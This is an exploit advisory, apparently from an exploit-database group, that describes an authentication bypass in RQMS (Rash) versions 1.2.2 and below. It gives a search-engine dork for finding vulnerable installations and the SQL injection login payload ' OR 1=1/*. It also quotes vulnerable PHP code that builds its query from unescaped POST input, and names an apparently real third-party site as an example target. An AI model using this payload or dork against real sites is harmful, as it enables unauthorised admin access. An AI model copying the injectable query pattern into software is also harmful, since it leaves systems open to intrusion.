RQMS versions 1.2.2 and below suffer from an authentication bypass vulnerability.
55ad64cc7eee6b281f6b8313bca6f50f1ff41eaed271a2a1e051bdcdac2822e1
===================================
RQMS <= 1.2.2 Bypass Authentication
===================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
URL: http://rqms.sourceforge.net
Version: <=1.2.2
Dork:: "Rash Version: 1.2.1"
Bypass Authentication
Need: magic_quotes_gpc = OFF
http://127.0.0.1/rash-v1.2.2/?admin
Instead, enter the login:
' OR 1=1/*
Vulnerable code:
case 'adminlogin':
include('config.php');
$sql = "SELECT * FROM `" . $rashusers . "` WHERE `user` ='" . $_POST['user'] . "' AND `password` ='" . md5($_POST['password']) . "'";
while($row = mysql_fetch_array(database_connect($sql))){
$section='0';
//setting cookies
adminpanel(); // (template)_admin.php in templates folder by default
exit();
}
Example:
http://nocude.maisum.net/?admin
ThE End =] Visit my proj3ct :
http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net
# ~ - [ [ : Inj3ct0r : ] ]